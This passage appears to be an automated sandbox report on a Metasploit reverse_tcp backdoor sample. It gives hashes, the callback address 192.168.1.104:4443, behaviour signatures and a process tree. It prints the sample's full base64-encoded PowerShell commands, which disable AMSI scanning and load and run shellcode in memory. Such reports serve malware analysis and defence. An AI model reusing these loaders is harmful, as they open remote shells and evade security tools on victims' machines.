metasploit | e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e

Analysis

max time kernel
42s
max time network
49s
platform
windows7_x64
resource
win7-20220414-en
submitted
16-05-2022 04:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe
Size

63KB
MD5

bca49300a03b56d35bb2818aeec3178d
SHA1

1b70831dfcaff7147ff28ed143dfa3d69ffa5a79
SHA256

e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e
SHA512

f964059779bf472fec53e8c8d0d1a73898e72c5df599c3e16d76c88c15fdc4041c4609339cd25ce8d8e00e1d3b1fff89dde96aad7192e3e345706a0ae67140e6

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

192.168.1.104:4443

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1976 powershell.exe
1524 powershell.exe
848 powershell.exe
1232 powershell.exe
1532 powershell.exe

pid	process
1976	powershell.exe
1524	powershell.exe
848	powershell.exe
1232	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.execmd.exepowershell.exepowershell.execsc.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2020 wrote to memory of 2000	2020	e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe	cmd.exe
PID 2020 wrote to memory of 2000	2020	e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe	cmd.exe
PID 2020 wrote to memory of 2000	2020	e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe	cmd.exe
PID 2000 wrote to memory of 1976	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 1976	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 1976	2000	cmd.exe	powershell.exe
PID 1976 wrote to memory of 1524	1976	powershell.exe	powershell.exe
PID 1976 wrote to memory of 1524	1976	powershell.exe	powershell.exe
PID 1976 wrote to memory of 1524	1976	powershell.exe	powershell.exe
PID 1524 wrote to memory of 528	1524	powershell.exe	csc.exe
PID 1524 wrote to memory of 528	1524	powershell.exe	csc.exe
PID 1524 wrote to memory of 528	1524	powershell.exe	csc.exe
PID 528 wrote to memory of 1720	528	csc.exe	cvtres.exe
PID 528 wrote to memory of 1720	528	csc.exe	cvtres.exe
PID 528 wrote to memory of 1720	528	csc.exe	cvtres.exe
PID 2000 wrote to memory of 848	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 848	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 848	2000	cmd.exe	powershell.exe
PID 848 wrote to memory of 1232	848	powershell.exe	powershell.exe
PID 848 wrote to memory of 1232	848	powershell.exe	powershell.exe
PID 848 wrote to memory of 1232	848	powershell.exe	powershell.exe
PID 1232 wrote to memory of 1532	1232	powershell.exe	powershell.exe
PID 1232 wrote to memory of 1532	1232	powershell.exe	powershell.exe
PID 1232 wrote to memory of 1532	1232	powershell.exe	powershell.exe
PID 1532 wrote to memory of 272	1532	powershell.exe	csc.exe
PID 1532 wrote to memory of 272	1532	powershell.exe	csc.exe
PID 1532 wrote to memory of 272	1532	powershell.exe	csc.exe
PID 272 wrote to memory of 696	272	csc.exe	cvtres.exe
PID 272 wrote to memory of 696	272	csc.exe	cvtres.exe
PID 272 wrote to memory of 696	272	csc.exe	cvtres.exe
PID 1532 wrote to memory of 324	1532	powershell.exe	dw20.exe
PID 1532 wrote to memory of 324	1532	powershell.exe	dw20.exe
PID 1532 wrote to memory of 324	1532	powershell.exe	dw20.exe

C:\Users\Admin\AppData\Local\Temp\e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe
"C:\Users\Admin\AppData\Local\Temp\e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\472F.tmp\4730.tmp\4731.bat C:\Users\Admin\AppData\Local\Temp\e37076b8a3c03d4b84479529baf78017f065301e841a02df10578ce46e72cc6e.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv hAo -;sv XcN ec;sv GXk ((gv hAo).value.toString()+(gv XcN).value.toString());powershell (gv GXk).value.toString() ('JAB3AGgAVgB1AHoAdABjAEcAUgBHACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJAB3AGgAVgB1AHoAdABjAEcAUgBHADsAJABiAHYAegBqAEoAQwBpAFcAegAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzAGkALgBkAGwAIgArACIAbAAiACsAIgAiACkALAAgACIAQQBtAHMAaQBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQATgBDAFgAcQBLAHkAeQBqACAAPQAgADAAOwBbAFcAaQBuADMAMgBdADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGIAdgB6AGoASgBDAGkAVwB6ACwAIABbAHUAaQBuAHQAMwAyAF0AWwB1AGkAbgB0ADMAMgBdADUALAAgADAAeAA0ADAALAAgAFsAcgBlAGYAXQAkAE4AQwBYAHEASwB5AHkAagApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgACgAIgB9AEIAOAAsACAAfQA1ADcALAAgAH0AMAAwACwAIAB9ADAANwAsACAAfQA4ADAALAAgAH0AQwAzACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACAAIgAwAHgAIgApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoACQATwB4AFoAQwBGAG4ATgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAE8AeABaAEMARgBuAE4ALAAgADAALAAgACQAYgB2AHoAagBKAEMAaQBXAHoALAAgADYAKQA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JAB3AGgAVgB1AHoAdABjAEcAUgBHACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJAB3AGgAVgB1AHoAdABjAEcAUgBHADsAJABiAHYAegBqAEoAQwBpAFcAegAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzAGkALgBkAGwAIgArACIAbAAiACsAIgAiACkALAAgACIAQQBtAHMAaQBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQATgBDAFgAcQBLAHkAeQBqACAAPQAgADAAOwBbAFcAaQBuADMAMgBdADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGIAdgB6AGoASgBDAGkAVwB6ACwAIABbAHUAaQBuAHQAMwAyAF0AWwB1AGkAbgB0ADMAMgBdADUALAAgADAAeAA0ADAALAAgAFsAcgBlAGYAXQAkAE4AQwBYAHEASwB5AHkAagApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgACgAIgB9AEIAOAAsACAAfQA1ADcALAAgAH0AMAAwACwAIAB9ADAANwAsACAAfQA4ADAALAAgAH0AQwAzACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACAAIgAwAHgAIgApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoACQATwB4AFoAQwBGAG4ATgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAE8AeABaAEMARgBuAE4ALAAgADAALAAgACQAYgB2AHoAagBKAEMAaQBXAHoALAAgADYAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krnx8_y1.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CF8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6CA9.tmp"
6⤵
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv hAo -;sv XcN ec;sv GXk ((gv hAo).value.toString()+(gv XcN).value.toString());powershell (gv GXk).value.toString() ('JABRAGcAPQAnACQAQwBRAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAIgArACIAZQAiACsAIgByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABGAEwARAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUwByAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AMAAxACwAfQA2ADgALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBiACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsA'+'H0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEoAaAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAQwBRACAALQBOAGEAbQBlACAAIgBPAEMAIgAgAC0AbgBhAG0AZQBzACAAdABKAFEAOwAkAEoAaAA9ACQASgBoAC4AcgBlAHAAbABhAGMAZQAoACIAdABKAFEAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAbwAiACsAIgBuACIAKwAiAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAUwByACAAPQAgACQAUwByAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBjAHMAWQBkAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAYwBzAFkAZAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAZQBuAD0AMAB4ADEAMAAwADIAOwBpAGYAIAAoACQAUwByAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADIAKQB7ACQAZQBuAD0AJABTAHIALgBMAH0AOwAkAEIAdQA9ACQASgBoADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAAyACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABGAEwARAAgAD0AIAAwADsAZgBvAHIAKAAkAEIAcAA9ADAAOwAkAEIAcAAgAC0AbABlACgAJABTAHIALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAQgBwACsAKwApAHsAJABKAGgAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABCAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAQgBwACkALAAgACQAUwByAFsAJABCAHAAXQAsACAAMQApAH0AOwAkAEoAaAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABCAHUALAAgADAAeAAxADAAMAAyACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABGAEwARAApADsAJABsAGUAVwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABKAGgAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABsAGUAVwAsACQAQgB1ACwAMAAsADAALAAwACkAOwAnADsAJABHAGgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFEAZwApACkAOwAkAGEAYgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABTAEYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAZAB1AE0AIAA9ACAAIgBDADoAXAAkAFMARgBcAHQAdAB3AFgARgBSAE4ASABcACQAUwBGACQAYQBiAFwAdgAxAC4AMABcACQAYQBiACIAOwAkAGQAdQBNACAAPQAgACQAZAB1AE0ALgByAGUAcABsAGEAYwBlACgAIgB0AHQAdwBYACIALAAgACIAcwB5AHMAIgApADsAJABkAHUATQAgAD0AIAAkAGQAdQBNAC4AcgBlAHAAbABhAGMAZQAoACIARgBSAE4ASAAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAEwAVgB2ACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEwAVgB2ACcAKQB7ACQAYQBiAD0AIAAkAGQAdQBNAH0AOwAkAHcAWgA9ACIAIAAkAGEAYgAgAHUAaABFACAAJABHAGgAIgA7ACQAdwBaAD0AJAB3AFoALgByAGUAcABsAGEAYwBlACgAIgB1AGgARQAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHcAWgA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABRAGcAPQAnACQAQwBRAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGU